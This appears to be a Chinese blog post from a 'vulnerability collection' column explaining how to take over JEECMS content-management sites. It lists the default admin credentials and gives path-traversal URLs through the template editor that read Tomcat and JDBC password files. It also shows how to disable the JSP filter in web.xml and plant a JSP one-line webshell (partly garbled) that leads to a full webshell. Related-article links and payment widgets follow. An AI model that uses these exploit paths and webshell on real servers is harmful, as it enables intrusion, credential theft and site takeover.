JEECMS后台任意文件编辑漏洞及拿shell

最新推荐文章于 2021-07-03 11:51:51 发布
最新推荐文章于 2021-07-03 11:51:51 发布
阅读量5.2k 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: shell jsp freemarker hibernate spring jdbc

JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构 安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。

 

 

2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do

默认账户:admin
默认密码:password

获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml

获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties



JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties


 

修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml



JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml

 

修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp


JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp


 

插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("

("f"))).write(request.getParameter("t").getBytes());
%>

修改后的一句话目录
/install/install_setup.jsp

一句话连接成功后的jsp大马目录:
/ma.jsp

 

 

注:

1:2.X 在后台可以上传媒体格式为jsp的文件

2:web.xml修改后需要重启服务器(自动加载更新的除外)
3:本文由网络大学(doie.net)原创,转载请留名。

7禧
关注
专栏目录
漏洞挖掘】——138、 逻辑漏洞任意用户注册
Fly_鹏程万里
07-26 133
用户注册时一般会采用短信验证码的方式来对用户的身份进行验证,但是部分网站在进行验证时未严格的检查手机号码与短信验证码的一致性或者短信验证码使用4位数导致可以批量保利猜解导致任意用户注册。
JEEWMS 任意文件读取漏洞
最新发布
weixin_43567873的博客
03-29 104
JEEWMS 任意文件读取漏洞
某版本JEECMS后台存在通用struts2命令执行漏洞
"黑色键盘's Bolg"
12-25 1607
某版本JEECMS后台存在通用struts2命令执行漏洞。 可通过谷歌搜索关键字inurl:login/jeecms.do,可获得多个存在st2的漏洞网站 该版本为jeecmsV2.x版本,漏洞系struts2框架自带的一个安全漏洞,由于jeecms在2010年开始停止了对jeecmsV2.X版本的维护,并建议广大用户统一升级到jeecms最新版本,估计还有很多用户至今未升级,在此,我
玩了下JeeCms命令执行漏洞
NilLazy的博客
11-26 6801
第一个站点 首先看了下信息,是管理员权限 (好像这种命令执行漏洞都是administrator权限吧。。。 然后就是看下开没开3389了。。 Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 0.0.0
jeecms明文密码传输漏洞
qq_36397267的博客
06-01 2192
关于jeecms明文密码传输漏洞修改:思路:由于jeecms密码加密采用md532位加密算法,是不可逆过程,数据库存放的是加密后的密码,登陆认证是将前台传入的密码加密后和数据库进行对比,所以往后台提交密码为加密后的密码的话,势必数据库密码也要加密一次,然后做对比就可以了。前台修改://密码框密码进行加密function passwordMd5(){    var x=document.getEle...
jeecms v9.3 has a stroed xss vulnerability
libieme的博客
10-31 3686
jeecms v9.3 has a stroed xss vulnerability An issue was discovered in jeecms v9.3 There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. poc ...
【原创】JEECMS v6~v7任意文件上传漏洞(1)
weixin_34160277的博客
01-19 1847
文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cmsjsp cms)的简称。该系统基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点;采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构。广泛应用于政府(部委和省级政府部门、市、县、乡及委办局)、教...
JEECMS修改后台地址
11-04
JEECMS(Java Enterprise ...接下来,你需要编辑`jeecms-servlet-admin.xml`文件。这个文件包含了后台服务的相关配置。在文件中找到`adminContextInterceptor` bean,这是一个用于处理后台请求的拦截器: ```xml ...
jeecms文档
05-12
本文将围绕“Jeecms文档”这一主题,深入解析Jeecms二次开发的相关知识点。 首先,Jeecms的核心特性在于其模块化设计,允许开发者通过插件形式进行功能扩展。在二次开发过程中,理解并掌握这一特性至关重要,因为这...
JEECMS V6后台地址修改懒人包
09-15
包中的文件主要是针对JEECMS V6的源码进行了针对性的修改,用户只需要将这些修改后的文件覆盖到原有的JEECMS安装目录中对应的位置,就可以实现后台访问路径的变更。这通常涉及到以下几个关键文件或目录: 1. **...
jeecmsv 前后台网站
10-23
cms 是一个很好的前后台集成网站,在后台可以发布一些消息前台可以访问到
JEECMS 后台日志、后台管理路径
cpu521的专栏
09-25 931
一、日志配件 jeecms的日志中间件采用的是logback,一个江湖传闻性能优于log4j的家伙,因为我并没有针对这个问题进行过测试,其程序中的日志方法支持参数化到是蛮方便的。 jeecms中的logback配置文件是logback.xml,在classes包中。为了方便二次开发调试方便,重点位置我以红色标出,修改如下:     &lt;?xml version="1.0" enc...
【原创】JEECMS v6~v7任意文件上传漏洞(2)
weixin_34245749的博客
01-19 640
文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cmsjsp cms)的简称。该系统基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点;采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构。广泛应用于政府(部委和省级政府部门、市、县、乡及委办局)、教...
Jeecms弱口令和shiro反序列化RCE渗透测试记录
kelenwait的博客
07-03 9654
简介 Jeecms 是一个开源企业客户关系管理快速开发基础平台,Java企业应用开源框架,Java EE(J2EE)快速开发框架,使用经典技术组合(SpringSpring MVC、Apache Shiro、hibernate4、EasyUI、Jqgrid、Bootstrap UI),核心模块如:组织机构、角色用户、权限授权、数据权限、内容管理、工作流等功能。 在企业官网、新闻站点、OA资源管理等多个领域都有应用。 由于使用的Apache Shiro 是低版本的,存在shiro反序列漏洞漏洞影响 弱口
jeecms无法修改子栏目顺序,引出的源码漏洞
Soongp的博客
02-21 1857
老哥最近正在做一个cms的小项目(www.uni-orange.com),验收前期,逐一解决系统bug,直到一个bug的出现,害得老哥老老实实地坐了一天!! 简单介绍一下使用的cms框架:jeecms,国内开源的cms框架,其商业版jeecms并不开源,作为互联网产品,至今已经迭代到v8.1版本,这个数字说明:即使是一个产品,它仍然是存在问题,需要不断完善优化的。 相信多数使用过jeecms
jeecms升级shiro漏洞报错处理
l_degege的专栏
06-11 1123
一、问题描述 jeecmsv9中的shiro是1.4.0,存在漏洞,现在升级到1.6.0 1替换lib文件夹下的13个shiro包 2将cipherKey改成动态生成 https://blog.csdn.net/jlq_diligence/article/details/109790614 添加类、修改shiro-context.xml 3重启部署后报错 二、操作 应该缺少类org.owasp.encoder.Encode。 将encoder-1.2.2.jar放到lib下项目启动成功 https://
jeecms怎么修改后台访问路径?
weixin_33744141的博客
11-29 116
1,修改后台访问路径:如:http://localhost:8080/jeeadmin/jeecms/login.do改:http://localhost:8080/hailou/index.do修改方法:1、 将xml中的<servlet-mapping>< servlet-name>JeeCmsAdmin</servlet-name>&...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值